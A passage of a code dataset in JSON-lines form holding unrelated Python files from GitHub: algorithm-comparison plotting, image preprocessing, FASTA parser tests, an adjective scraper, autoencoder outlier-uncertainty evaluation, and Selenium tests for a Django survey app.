(plt.ggplot(data=df) + \n plt.aes(x=x, y=y, fill=f\"factor({groupBy})\") + \n plt.geom_bar(stat = \"identity\") + \n plt.theme(axis_text_x=plt.element_blank()) + \n plt.labs(fill = f\"{groupBy}\")\n )\n return plot\n\ndef scatterPlot(x, y, groupBy, df):\n expansion = (2,2.2)\n\n # Filters out optimal solution and \n # all variants of the linear-program \n # relaxation\n # Comment out the following code to include \n # them\n df = df[df.Algorithms != \"Opt\"]\n for postProcess in [\"Chanas\", \"Local-Search\"]:\n df = df[df.Algorithms != f\"Relaxed-Linear-Program_{postProcess}\"]\n\n adjusttext_settings = {'arrowprops': {\n 'arrowstyle': '->',\n 'color': 'black'\n }, 'expand_text' : expansion, \n 'expand_points' : expansion, \n 'expand_objects' : expansion}\n plot = (plt.ggplot(data=df) + \n plt.aes(x=x, y=y) + \n plt.geom_point(mapping = \n plt.aes(color=f\"factor({groupBy})\", \n shape=f\"factor({groupBy})\")) + \n plt.labs(color = groupBy, shape = groupBy) + \n plt.geom_text(plt.aes(label=f\"factor({groupBy})\"), \n size = 8,\n adjust_text = adjusttext_settings)\n )\n \n return plot\n\ndef paretoFilterDf(df):\n rows, columns = df.shape\n dominatedAlgorithms = list()\n\n for i in range(rows):\n dominated = False\n\n for j in range(rows):\n numWorse = 0\n numBetter = 0\n\n for k in range(1, columns):\n if df.iloc[i,k] > df.iloc[j,k]:\n numWorse += 1\n elif df.iloc[i,k] < df.iloc[j,k]:\n numBetter += 1 \n break\n\n if numWorse > 0 and numBetter == 0:\n dominated = 
True\n break\n\n if dominated:\n algorithm = df.iloc[i,0]\n dominatedAlgorithms.append(algorithm)\n \n for algorithm in dominatedAlgorithms:\n df = df[df.Algorithms != algorithm]\n\n return df\n \n\ndef normalizedData(df):\n minScore = df.min()[1]\n df['DISTANCE'] = df['DISTANCE'] / minScore \n df.columns = ['Algorithms','Cost', 'Time (CPU Seconds)']\n return df\n\ndef dictToDfFormat(data):\n out = list()\n\n for algorithm, info in data.items():\n dist, time = info\n out.append([algorithm, dist, time])\n return out\n\ndef collapseDuplicates(df):\n # Value is a tuple: totalDist, totalTime, number of data-points\n includedAlgorithms = dict()\n \n rows, _ = df.shape \n\n for i in range(0,rows):\n algorithm = df.iloc[i,0]\n\n if algorithm not in includedAlgorithms:\n includedAlgorithms[algorithm] = (df.iloc[i,1], df.iloc[i,2], 1)\n else:\n dist, time, num = includedAlgorithms[algorithm]\n\n distTotal = dist + df.iloc[i,1]\n timeTotal = time + df.iloc[i,2]\n \n includedAlgorithms[algorithm] = (distTotal, timeTotal, num + 1)\n\n toConvert = dict()\n for algorithm, info in includedAlgorithms.items():\n dist, time, num = info \n # To ensure float division\n num = float(num)\n toConvert[algorithm] = (dist / num, time / num)\n \n header = df.columns.values.tolist()\n return pd.DataFrame(dictToDfFormat(toConvert), columns=header)\n\n\ndef fileComparison(fileName, folder):\n # Handles spaces\n sep=\"\\\\s*,\\\\s*\"\n engine = \"python\"\n data = pd.read_csv(f\"{folder}{fileName}\", sep=sep, engine=engine)\n data = normalizedData(data)\n data = collapseDuplicates(data)\n data = paretoFilterDf(data)\n\n x = \"Cost\"\n y = \"Time (CPU Seconds)\"\n groupBy = \"Algorithms\"\n label = fileName[:len(fileName) - 4]\n\n outputLabel = f\"{label}{fileType}\"\n scatterPlot(x, y, groupBy, data).save(f\"scatter_{outputLabel}\")\n \n \"\"\" barChart(groupBy, x, groupBy, data).save(f\"{x}_bar_{outputLabel}\")\n barChart(groupBy, y, groupBy, data).save(f\"{y}_bar_{outputLabel}\") \"\"\"\n\n\ndef overallComparison():\n paretoOptimal = paretoByAllData()\n data = pd.DataFrame(dictToDfFormat(paretoOptimal), columns=[\"ALGORITHM\", \"DISTANCE\", \"TIME\"])\n data = normalizedData(data)\n\n x = \"Average Cost\"\n y = \"Average Time (CPU Seconds)\"\n groupBy = \"Algorithms\"\n data.columns = [groupBy, x, y]\n\n scatterPlot(x,y,groupBy,data).save(f\"Overall Algorithm Comparison{fileType}\")\n\n\ndef perfByParamPlot(parameter):\n data = numpyfy.tidydf(parameter)\n\n # Convert to costs normalized by optimal\n minScore = data.min()[2]\n data['Average Kendall-Tau Distance'] = data['Average Kendall-Tau Distance'] / minScore\n data.columns = [\"Algorithms\", parameter, \"Average Cost\", \"Average Time (CPU Seconds)\"]\n\n paramValues = numpyfy.listByParam(parameter)\n\n # Scatter Plots for algorithm comparison\n for value in paramValues:\n if parameter == \"n\":\n toPlot = data[data.n == value]\n elif parameter == \"N\":\n toPlot = data[data.N == value]\n elif parameter == \"th\":\n toPlot = data[data.th == value]\n elif parameter == \"k\":\n toPlot = data[data.k == value]\n\n # Pareto Filtering\n toPlot = toPlot.drop(columns=[parameter])\n toPlot = paretoFilterDf(toPlot)\n\n plot = scatterPlot(\"Average Cost\", \"Average Time (CPU Seconds)\", \"Algorithms\", toPlot)\n plot.save(f\"{parameter}-{value}_scatter{fileType}\")\n\n\nif __name__ == '__main__':\n overallComparison()\n syntheticFiles = [\"mallows_topk_n50_N5000_th0.001_k45.csv\",\n \"mallows_topk_n30_N500_th0.01_k15.csv\",\n \"mallows_topk_n10_N50_th0.1_k2.csv\"]\n for name 
in syntheticFiles:\n fileComparison(name, syntheticDirectory)\n\n realFiles = [\"CED-00010-00000046.csv\"]\n \n for name in realFiles:\n fileComparison(name, realDirectory)\n\n for param in [\"n\", \"N\", \"th\", \"k\"]:\n perfByParamPlot(param)","repo_name":"ammareltigani/top-lists-aggregation","sub_path":"code/visualizations.py","file_name":"visualizations.py","file_ext":"py","file_size_in_byte":7604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30819567541","text":"import os\n\nimport cv2\nfrom cleanvision.imagelab import Imagelab\n\nfrom utils import costants\n\n\ndef analyze_quality_of_images(path_ds):\n \"\"\"\n Analyses the overall quality of the dataset by looking\n for things like duplicates, blurry images, and dark images.\n\n Args:\n path_ds (str): path of the dataset\n \"\"\"\n imagelab = Imagelab(data_path=path_ds)\n\n # imagelab.list_possible_issue_types()\n # imagelab.list_default_issue_types()\n\n imagelab.find_issues()\n imagelab.report()\n\n\n\n\n\ndef create_downsampled_ds(original_ds_path, new_dataset_path, downsample_dimensions):\n \"\"\"\n Creates a downsampled version of a given dataset.\n\n Args:\n - original_ds_path (str): path of the original dataset\n we want to downsample\n - new_dataset_path (str): path of the new downsampled\n dataset\n - downsample_dimensions (Tuple): dimensions of the new\n downsampled images\n\n Returns: None\n \"\"\"\n if not os.path.exists(new_dataset_path):\n os.mkdir(new_dataset_path)\n\n for image_name in os.listdir(original_ds_path):\n if \".png\" in image_name:\n print(image_name)\n original_image = cv2.imread(os.path.join(original_ds_path, image_name))\n downsampled_image = cv2.resize(original_image, downsample_dimensions)\n cv2.imwrite(os.path.join(new_dataset_path, image_name), downsampled_image)\n\n\n\ndef rename_images_hr2():\n ds_path = costants.ORIGINAL_DS_TEST\n for image_name in os.listdir(ds_path):\n if \".png\" in image_name:\n num_image = image_name.split(\"x\")[0]\n new_name = num_image + \".png\"\n print(os.path.join(ds_path, image_name),\n os.path.join(ds_path, image_name))\n os.rename(\n src=os.path.join(ds_path, image_name),\n dst=os.path.join(ds_path, new_name)\n )\n\n\n\ndef rename_images_x8():\n ds_path = costants.LR_VAL\n for image_name in os.listdir(ds_path):\n if \".png\" in image_name:\n num_image = image_name.split(\".\")[0]\n new_name = num_image + \"x4(x8).png\"\n print(os.path.join(ds_path, image_name),\n os.path.join(ds_path, image_name))\n os.rename(\n src=os.path.join(ds_path, image_name),\n dst=os.path.join(ds_path, new_name)\n )\n\n\n\n\n\ndef main():\n pass\n\nif __name__==\"__main__\":\n main()\n","repo_name":"williamdevena/Image_Super_Resolution","sub_path":"utils/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30502427368","text":"import t\n\n@t.parse(\"multidef.fa\")\ndef test_multi(handle):\n recs = list(t.nebfa.parse(handle))\n t.eq(len(recs), 2)\n first(recs[0])\n second(recs[1])\n\ndef first(rec):\n t.eq(rec.meta, {\n 'ids': [\n ('gi', '15674171'),\n ('ref', 'NP_268346.1'),\n ('gi', '116513137'),\n ('ref', 'YP_812044.1'),\n ('gi', '125625229'),\n ('ref', 'YP_001033712.1'),\n ('gi', '13878750'),\n ('sp', 'Q9CDN0.1|RS18_LACLA'),\n ('gi', '122939895'),\n ('sp', 'Q02VU1.1|RS18_LACLS'),\n ('gi', '166220956'),\n ('sp', 'A2RNZ2.1|RS18_LACLM'),\n ('gi', '12725253'),\n ('gb', 
'AAK06287.1|AE006448_5'),\n ('gi', '116108791'),\n ('gb', 'ABJ73931.1'),\n ('gi', '124494037'),\n ('emb', 'CAL99037.1')\n ],\n 'desc': [\n '30S ribosomal protein S18 [Lactococcus lactis subsp. lactis Il1403]',\n '30S ribosomal protein S18 [Lactococcus lactis subsp. cremoris SK11]',\n '30S ribosomal protein S18 [Lactococcus lactis subsp. cremoris MG1363]',\n 'RecName: Full=30S ribosomal protein S18',\n 'SSU ribosomal protein S18P [Lactococcus lactis subsp. cremoris SK11]'\n ]\n })\n t.eq(rec.id, ('gi', '15674171'))\n t.eq(rec.desc, \"30S ribosomal protein S18 [Lactococcus lactis subsp. lactis Il1403]\")\n t.eq(rec.sequence, ''.join(\"\"\"\n MAQQRRGGFKRRKKVDFIAANKIEVVDYKDTELLKRFISERGKILPRRVTGTSAKNQ\n RKVVNAIKRARVMALLPFVAEDQN\n \"\"\".split()))\n t.eq(rec.hash, \"C53CFB6A15CBD598154C31B396F57B917222EA2D\")\n\ndef second(rec):\n t.eq(rec.meta, {\n 'ids': [\n ('gi', '66816243'),\n ('ref', 'XP_642131.1'),\n ('gi', '1705556'),\n ('sp', 'P54670.1|CAF1_DICDI'),\n ('gi', '793761'),\n ('dbj', 'BAA06266.1'),\n ('gi', '60470106'),\n ('gb', 'EAL68086.1')\n ],\n 'desc': [\n 'calfumirin-1 [Dictyostelium discoideum AX4]',\n 'RecName: Full=Calfumirin-1; Short=CAF-1',\n 'calfumirin-1 [Dictyostelium discoideum]'\n ]\n })\n t.eq(rec.id, ('gi', '66816243'))\n t.eq(rec.desc, 'calfumirin-1 [Dictyostelium discoideum AX4]')\n t.eq(rec.sequence, ''.join(\"\"\"\n MASTQNIVEEVQKMLDTYDTNKDGEITKAEAVEYFKGKKAFNPERSAIYLFQVYDKDNDGKITIKELA\n GDIDFDKALKEYKEKQAKSKQQEAEVEEDIEAFILRHNKDDNTDITKDELIQGFKETGAKDPEKSANF\n ILTEMDTNKDGTITVKELRVYYQKVQKLLNPDQ\n \"\"\".split()))\n t.eq(rec.hash, \"7D6B32F721E2E8BF34A37015C11E3FBAA0C791B8\")\n","repo_name":"ekspiulo/nebfa","sub_path":"test/test-multi-def.py","file_name":"test-multi-def.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26943845129","text":"import random\r\nimport requests \r\nfrom bs4 import BeautifulSoup \r\n\r\nURL = 'https://www.enchantedlearning.com/wordlist/adjectives.shtml'\r\nr = requests.get(URL) \r\n\r\nsoup = BeautifulSoup(r.content, 'html.parser') \r\n\r\nadjectives = (soup.find(id=\"main-content\").get_text(\" \"))\r\n\r\nlistofwords = adjectives.split(\" \")\r\n\r\nwhile '' in listofwords:\r\n listofwords.remove('')\r\n\r\nnewAdjectives = listofwords[18::]\r\n\r\nfor words in newAdjectives:\r\n if len(words) == 1:\r\n newAdjectives.remove(words)\r\n\r\nfor a in range(0,int(input(\"How many facts would you like today?\"))):\r\n Sen1 = (\"The Boyd Orr is\")\r\n num2 = random.randrange(0,len(newAdjectives))\r\n print(Sen1+ ' '+ newAdjectives[num2])","repo_name":"pyMurphy/hacker-olympics-2019","sub_path":"Krishang/BoydOrr.py","file_name":"BoydOrr.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72697613867","text":"import datetime\n\nimport numpy as np\n\nfrom baetorch.baetorch.evaluation import (\n concat_ood_score,\n evaluate_random_retained_unc,\n evaluate_misclas_detection,\n convert_hard_pred,\n summarise_retained_perf,\n evaluate_retained_unc_v2,\n calc_auroc,\n)\nfrom baetorch.baetorch.models_v2.outlier_proba import BAE_Outlier_Proba\nfrom baetorch.baetorch.models_v2.vae import VAE\nfrom uncertainty_ood.exceed import calc_exceed\nfrom uncertainty_ood_v2.util.get_predictions import flatten_nll, calc_e_nll\nfrom util.evaluate_ood import evaluate_bce_se\nfrom util.exp_manager import ExperimentManager\n\n\ndef evaluate_ood_unc(\n bae_model,\n x_id_train,\n 
x_id_test,\n x_ood_test,\n exp_name,\n exp_params,\n nll_key=\"nll\",\n eval_ood_unc=False,\n cdf_dists=[\"norm\", \"uniform\", \"ecdf\"],\n norm_scalings=[True, False],\n ret_flatten_nll=True,\n exp_man=None,\n round_deci=0,\n hard_threshold=0.5,\n):\n # === PREDICTIONS ===\n bae_id_pred = bae_model.predict(x_id_test, select_keys=[nll_key])\n bae_ood_pred = bae_model.predict(x_ood_test, select_keys=[nll_key])\n\n # get ood scores\n e_nll_id = flatten_nll(bae_id_pred[nll_key]).mean(0)\n e_nll_ood = flatten_nll(bae_ood_pred[nll_key]).mean(0)\n var_nll_id = flatten_nll(bae_id_pred[nll_key]).var(0)\n var_nll_ood = flatten_nll(bae_ood_pred[nll_key]).var(0)\n\n eval_auroc = {\n \"E_AUROC\": calc_auroc(e_nll_id, e_nll_ood),\n \"V_AUROC\": calc_auroc(var_nll_id, var_nll_ood),\n }\n\n if exp_man is None:\n exp_man = ExperimentManager()\n res = exp_man.concat_params_res(exp_params, eval_auroc)\n exp_man.update_csv(exp_params=res, csv_name=exp_name + \"AUROC.csv\")\n\n # special case for evaluating bce vs mse\n if (\n bae_model.likelihood == \"gaussian\"\n and not bae_model.twin_output\n and bae_model.homoscedestic_mode == \"none\"\n ) or bae_model.likelihood == \"bernoulli\":\n eval_auroc_bce_se = evaluate_bce_se(bae_model, x_id_test, x_ood_test)\n if exp_man is None:\n exp_man = ExperimentManager()\n res = exp_man.concat_params_res(exp_params, eval_auroc_bce_se)\n exp_man.update_csv(exp_params=res, csv_name=exp_name + \"BCE_VS_SE.csv\")\n\n # === EVALUATE OUTLIER UNCERTAINTY ===\n if eval_ood_unc:\n # convert to outlier probability\n # 1. get reference distribution of NLL scores\n bae_id_ref_pred = bae_model.predict(x_id_train, select_keys=[nll_key])\n\n all_y_true = np.concatenate(\n (np.zeros_like(e_nll_id), np.ones_like(e_nll_ood))\n ).astype(int)\n all_var_nll_unc = np.concatenate((var_nll_id, var_nll_ood))\n concat_e_nll = concat_ood_score(e_nll_id, e_nll_ood)[1]\n\n # 2. 
define cdf distribution of OOD scores\n for cdf_dist in cdf_dists:\n bae_proba_model = BAE_Outlier_Proba(\n dist_type=cdf_dist,\n norm_scaling=True,\n fit_per_bae_sample=False if isinstance(bae_model, VAE) else True,\n )\n bae_proba_model.fit(bae_id_ref_pred[nll_key])\n\n for norm_scaling in norm_scalings:\n id_proba_mean, id_proba_unc = bae_proba_model.predict(\n bae_id_pred[nll_key], norm_scaling=norm_scaling\n )\n ood_proba_mean, ood_proba_unc = bae_proba_model.predict(\n bae_ood_pred[nll_key], norm_scaling=norm_scaling\n )\n\n # CONVERT HARD PRED\n all_proba_mean = np.concatenate((id_proba_mean, ood_proba_mean))\n all_hard_proba_pred = convert_hard_pred(\n all_proba_mean, p_threshold=hard_threshold\n )\n all_hard_proba_pred_ex = convert_hard_pred(\n concat_e_nll, p_threshold=np.max(e_nll_id)\n )\n # EXCEED UNCERTAINTY\n all_exceed_unc = calc_exceed(\n len(calc_e_nll(bae_id_ref_pred)),\n all_proba_mean,\n # all_hard_proba_pred,\n all_hard_proba_pred_ex,\n contamination=0.0,\n )\n\n # Evalute uncertainty performances\n retained_percs = [0.5, 0.6, 0.7, 0.8, 0.9, 1.0]\n\n # Evaluate retained performance\n retained_varnll_res = evaluate_retained_unc_v2(\n all_outprob_mean=concat_e_nll,\n all_hard_pred=all_hard_proba_pred,\n all_y_true=all_y_true,\n all_unc=all_var_nll_unc,\n )\n\n retained_exceed_res = evaluate_retained_unc_v2(\n all_outprob_mean=concat_e_nll,\n all_hard_pred=all_hard_proba_pred,\n # all_hard_pred=all_hard_proba_pred_ex,\n all_y_true=all_y_true,\n all_unc=all_exceed_unc,\n round_deci=round_deci,\n )\n\n retained_random_res = evaluate_random_retained_unc(\n all_outprob_mean=concat_e_nll,\n all_hard_pred=all_hard_proba_pred,\n all_y_true=all_y_true,\n repetition=10,\n retained_percs=retained_percs,\n )\n\n # evaluate misclassification detection\n misclas_varnll_res = evaluate_misclas_detection(\n all_y_true,\n all_hard_proba_pred,\n all_var_nll_unc,\n return_boxplot=True,\n )\n misclas_exceed_res = evaluate_misclas_detection(\n all_y_true,\n all_hard_proba_pred,\n # all_hard_proba_pred_ex,\n all_exceed_unc,\n return_boxplot=True,\n )\n\n # Save all results in dicts\n retained_res_all = {}\n misclas_res_all = {}\n retained_res_all.update(\n {\n \"varnll\": retained_varnll_res,\n \"exceed\": retained_exceed_res,\n \"random\": retained_random_res,\n }\n )\n\n misclas_res_all.update(\n {\n \"varnll\": misclas_varnll_res,\n \"exceed\": misclas_exceed_res,\n }\n )\n\n for proba_unc_key in [\"epi\", \"alea\", \"total\"]:\n all_proba_unc = np.concatenate(\n (id_proba_unc[proba_unc_key], ood_proba_unc[proba_unc_key])\n )\n retained_prob_unc_res = evaluate_retained_unc_v2(\n all_outprob_mean=concat_e_nll,\n all_hard_pred=all_hard_proba_pred,\n all_y_true=all_y_true,\n all_unc=all_proba_unc,\n round_deci=round_deci,\n )\n\n misclas_prob_unc_res = evaluate_misclas_detection(\n all_y_true,\n all_hard_proba_pred,\n all_proba_unc,\n return_boxplot=True,\n )\n\n retained_res_all.update(\n {\"proba-\" + proba_unc_key: retained_prob_unc_res}\n )\n misclas_res_all.update(\n {\"proba-\" + proba_unc_key: misclas_prob_unc_res}\n )\n\n # Save uncertainty evaluation results in CSV\n if exp_man is None:\n exp_man = ExperimentManager()\n unc_method = {\"dist\": cdf_dist, \"norm\": norm_scaling}\n base_method_columns = exp_man.concat_params_res(exp_params, unc_method)\n pickle_retained = exp_man.encode(\n exp_man.concat_params_res(\n exp_params,\n unc_method,\n {\"restype\": \"retained\", \"date\": datetime.datetime.now()},\n )\n )\n pickle_misclas = exp_man.encode(\n exp_man.concat_params_res(\n 
exp_params,\n unc_method,\n {\"restype\": \"misclas\", \"date\": datetime.datetime.now()},\n )\n )\n\n for unc_method_name in retained_res_all.keys():\n summary_ret_res = summarise_retained_perf(\n retained_res_all[unc_method_name], flatten_key=True\n )\n retained_csv = exp_man.concat_params_res(\n base_method_columns,\n {\"unc_method\": unc_method_name},\n summary_ret_res,\n )\n exp_man.update_csv(\n retained_csv,\n insert_pickle=pickle_retained,\n csv_name=exp_name + \"retained_perf.csv\",\n )\n exp_man.encode_pickle(pickle_retained, data=retained_res_all)\n\n # handle misclas results\n for unc_method_name in misclas_res_all.keys():\n misclas_csv = exp_man.concat_params_res(\n base_method_columns,\n {\"unc_method\": unc_method_name},\n misclas_res_all[unc_method_name][\"all_err\"],\n )\n exp_man.update_csv(\n misclas_csv,\n insert_pickle=pickle_misclas,\n csv_name=exp_name + \"misclas_perf.csv\",\n )\n exp_man.encode_pickle(pickle_misclas, data=misclas_res_all)\n\n # return results\n if ret_flatten_nll and eval_ood_unc:\n return (e_nll_id, e_nll_ood, var_nll_id, var_nll_ood), (\n eval_auroc,\n retained_res_all,\n misclas_res_all,\n )\n elif ret_flatten_nll and not eval_ood_unc:\n return (e_nll_id, e_nll_ood, var_nll_id, var_nll_ood), (eval_auroc, {}, {})\n elif not ret_flatten_nll and eval_ood_unc:\n return (bae_id_pred, bae_ood_pred), (\n eval_auroc,\n retained_res_all,\n misclas_res_all,\n )\n else:\n return (bae_id_pred, bae_ood_pred), (eval_auroc, {}, {})\n","repo_name":"bangxiangyong/bae-anomaly-uncertainty","sub_path":"strathclyde_analysis_v2/evaluate_outlier_uncertainty.py","file_name":"evaluate_outlier_uncertainty.py","file_ext":"py","file_size_in_byte":10468,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"71518722346","text":"'''functional tests for survey app'''\nfrom urllib.parse import urlparse\nfrom time import sleep\nfrom functools import wraps\n\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom django.conf import settings\nfrom django.urls import reverse\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import WebDriverException, ElementClickInterceptedException, NoSuchElementException\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\n\nfrom . 
import factory\nfrom ..models import Question, QuestionTypes, SurveyResponse\n\n\ndef wrap_in_wait(func, retires=5):\n @wraps(func)\n def wrapper(*args, **kwargs):\n return wait(func, *args, retires=retires, **kwargs)\n return wrapper\n\ndef wait(func, *args, retires=10, exceptions=[AssertionError, NoSuchElementException], **kwargs):\n for i in range(retires):\n try:\n return func(*args, **kwargs)\n except Exception as e:\n print('retry', i)\n if type(e) not in exceptions:\n raise e\n\n if i == retires-1:\n raise e\n\n sleep(0.5 + i*.2)\n\ndef wait_until_document_ready(browser):\n WebDriverWait(browser, 20) \\\n .until(lambda d: d.execute_script('return document.readyState == \"complete\"'))\n \n\n\nclass FunctionalTestCase(StaticLiveServerTestCase):\n def setUp(self):\n self.browser = webdriver.Chrome()\n super().setUp()\n\n def tearDown(self):\n self.browser.quit()\n super().tearDown()\n \nclass SurveysFunctionalTest(FunctionalTestCase):\n ''''Collections of all functional tests'''\n def setUp(self):\n self.surveys = factory.create_surveys()\n super().setUp()\n\n def test_can_see_list_of_surveys(self):\n '''Test page lists surveys in database'''\n self.browser.get(self.live_server_url)\n title_elements = wait(self.browser.find_elements_by_css_selector, '.surveys .card-title')\n summary_elements = self.browser.find_elements_by_css_selector('.surveys .card-text')\n\n self.assertEqual([survey.title.lower() for survey in self.surveys],\n [elem.text.lower() for elem in title_elements])\n self.assertEqual([survey.summary.lower() for survey in self.surveys],\n [elem.text.lower() for elem in summary_elements])\n\n def test_survey_response_count_in_list_item(self):\n '''test list item shows response of a survey'''\n factory.add_responses_to_surveys(self.surveys)\n counts = [SurveyResponse.objects.exclude(completed_date=None).filter(survey=survey).count() for survey in self.surveys]\n self.browser.get(self.live_server_url)\n resp_count_elements = wait(self.browser.find_elements_by_css_selector, '.surveys .resp_count')\n self.assertEqual([elem.text for elem in resp_count_elements], list(map(str, counts)))\n\n\n\n def test_clicking_list_items_takes_to_survey_page(self):\n '''Test clicking on survey items takes to survey page'''\n self.browser.get(self.live_server_url)\n self.browser.find_element_by_id(f'survey_{self.surveys[0].pk}').click()\n self.assertEqual(urlparse(self.browser.current_url).path,\n reverse(\"survey:detail\", args=[self.surveys[0].pk]))\n\n\nclass SurveyFunctionalTest(FunctionalTestCase):\n '''Functional tests for survey detail view'''\n\n def setUp(self):\n self.survey = factory.create_surveys()[0]\n super().setUp()\n\n def test_view_shows_correct_survey(self):\n '''Test detail view showing correct survey'''\n self.browser.get(self.live_server_url+self.survey.get_absolute_url())\n survey_title = self.browser.find_element_by_id('survey-title').text\n self.assertEqual(survey_title.lower(), self.survey.title.lower())\n\n survey_summary = self.browser.find_element_by_id('survey-summary').text\n self.assertEqual(survey_summary, self.survey.summary)\n\n def test_can_go_to_takesurvey_page(self):\n '''Test can go to takesurvey page of by clicking button'''\n survey_with_question = factory.create_survey_with_questions()\n self.browser.get(self.live_server_url+survey_with_question.get_absolute_url())\n self.browser.find_element_by_id('btn_takesurvey').click()\n\n expected_url = reverse('survey:take_survey', args=[survey_with_question.pk, 1])\n 
self.assertEqual(urlparse(self.browser.current_url).path, expected_url)\n\n def test_take_survey_button_disabled_when_no_questions(self):\n '''Test Take Survey buttion is disabled if survey don't have questions'''\n self.browser.get(self.live_server_url+self.survey.get_absolute_url())\n \n # raises error if button is not disabled\n btn = self.browser.find_element_by_css_selector('#btn_takesurvey.disabled')\n with self.assertRaises(ElementClickInterceptedException):\n btn.click()\n\nclass TakeSurveyFunctionalTest(FunctionalTestCase):\n '''Test case for TakeSurvey view'''\n\n def setUp(self):\n self.survey = factory.create_survey_with_questions()\n super().setUp()\n\n def test_invoking_url_shows_ui_of_1st_question(self):\n '''Test hitting url of TakeSurvey page will show 1st question of specified survey'''\n url = reverse('survey:take_survey', args=[self.survey.pk, 1])\n self.browser.get(self.live_server_url+url)\n\n self.assertEqual(self.browser.find_element_by_id('survey-title').text.lower(),\n self.survey.title.lower())\n\n self.assertEqual(self.browser.find_element_by_id('question-title').text.lower(),\n self.survey.questions.first().question.lower())\n\n def load_question_at(self, index):\n url = reverse('survey:take_survey', args=[self.survey.pk, index])\n self.browser.get(self.live_server_url+url)\n btn_next = self.browser.find_element_by_id('btn-next')\n btn_previous = self.browser.find_element_by_id('btn-previous')\n return btn_next, btn_previous\n\n def test_previous_button_disabled_for_1st_question(self):\n # for 1st question\n _, btn_previous = self.load_question_at(1)\n with self.assertRaises(ElementClickInterceptedException):\n btn_previous.click()\n\n def test_previous_button_works(self):\n btn_next, btn_previous = self.load_question_at(2)\n btn_next.click()\n \n btn_previous = wait(self.browser.find_element_by_id, 'btn-previous')\n sleep(1)\n btn_previous.click()\n expected_url = reverse('survey:take_survey', args=[self.survey.pk, 2])\n sleep(3)\n self.assertEqual(urlparse(self.browser.current_url).path, expected_url)\n\n \n def test_next_button_works(self):\n # for 1st question\n btn_next, _ = self.load_question_at(1)\n btn_next.click()\n expected_url = reverse('survey:take_survey', args=[self.survey.pk, 2])\n self.assertEqual(urlparse(self.browser.current_url).path, expected_url)\n\n # for questions betweeen 1st and last\n btn_next, _ = self.load_question_at(2)\n btn_next.click()\n expected_url = reverse('survey:take_survey', args=[self.survey.pk, 3])\n self.assertEqual(urlparse(self.browser.current_url).path, expected_url)\n\n # for last question\n last_index = self.survey.questions.count()\n btn_next, _ = self.load_question_at(last_index)\n\n expected_url = reverse('survey:finish_survey', args=[self.survey.pk])\n next_url = urlparse(btn_next.get_attribute('href')).path\n btn_next.click()\n self.assertEqual(next_url, expected_url)\n\n\n def test_survey_response_id_cookie_set(self):\n url = reverse('survey:take_survey', args=[self.survey.pk, 1])\n self.browser.get(self.live_server_url+url)\n value = self.browser.get_cookie(f'survey_response_id_{self.survey.pk}')['value']\n self.assertTrue(value.isnumeric())\n\n\n\nclass QuestionTypeTestCase(FunctionalTestCase):\n question_type = None\n def setUp(self):\n self.survey = factory.create_survey_with_questions()\n self.question, index = factory.get_question_and_index_of_type(self.survey, self.question_type.name)\n self.url = reverse('survey:take_survey', args=[self.survey.pk, index])\n super().setUp()\n\n\nclass 
TestDescQuestionType(QuestionTypeTestCase):\n '''Test case for Text question type'''\n question_type = QuestionTypes.DESC\n def test_ui_for_description_type_question(self):\n self.browser.get(self.live_server_url+self.url)\n self.assertEqual(self.browser.find_element_by_id('description').text, self.question.description)\n\nclass TestTextQuestionType(QuestionTypeTestCase):\n '''Test case for Text question type'''\n question_type = QuestionTypes.TEXT\n def test_ui_of_text_question_type(self):\n '''Test ui components of text question type'''\n self.browser.get(self.live_server_url + self.url)\n self.browser.find_element_by_css_selector('input#id_response')\n\n form = self.browser.find_element_by_id('question_form')\n self.assertEqual(urlparse(form.get_attribute('action')).path, self.url)\n self.assertEqual(form.get_attribute('method'), 'post')\n\n def test_question_form_is_loaded_with_existing_answer(self):\n '''Test question form pre-loads'''\n self.browser.get(self.live_server_url + self.url)\n inp = self.browser.find_element_by_css_selector(\"input#id_response\")\n inp.send_keys(\"This is my answer\")\n\n self.browser.find_element_by_id('btn-next').click()\n\n wait_until_document_ready(self.browser)\n btn_previous = self.browser.find_element_by_id('btn-previous')\n btn_previous.click()\n wait_until_document_ready(self.browser)\n inp = self.browser.find_element_by_css_selector(\"input#id_response\")\n self.assertEqual(inp.get_attribute('value'), \"This is my answer\")\n\n \n\n\nclass TestFinishSurveyView(FunctionalTestCase):\n '''Functional test for FinishSurvey view'''\n\n def setUp(self):\n super().setUp()\n self.survey, self.survey_response = factory.create_survey_with_text_question_and_answer()\n self.cookie_key = f'survey_response_id_{self.survey.pk}'\n self.browser.get(self.live_server_url)\n self.browser.add_cookie({'name': self.cookie_key, 'value': str(self.survey_response.pk)})\n url = reverse('survey:finish_survey', args=[self.survey.pk])\n self.browser.get(self.live_server_url+url)\n\n def test_review_button_works(self):\n '''Test review button starts the survey again for review'''\n \n self.browser.find_element_by_id(\"btn-review\").click()\n\n self.assertEqual(urlparse(self.browser.current_url).path,\n reverse('survey:take_survey', args=[self.survey.pk, 1]))\n \n\n def test_complete_button_marks_survey_response_complete(self):\n '''Test pressing Finish button updates survey_response's complted_date'''\n \n btn_finish = self.browser.find_element_by_id(\"btn-finish\")\n\n with self.assertRaises(NoSuchElementException):\n self.browser.find_element_by_css_selector('div#done')\n\n btn_finish.click()\n wait(self.assertEqual, urlparse(self.browser.current_url).path, reverse('survey:thank_you'))\n\n self.assertEqual(urlparse(self.browser.current_url).path, reverse('survey:thank_you'))\n","repo_name":"devbkhadka/survey_app","sub_path":"survey_app_repo/survey/tests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":11478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14582786784","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.db.models import F\nfrom 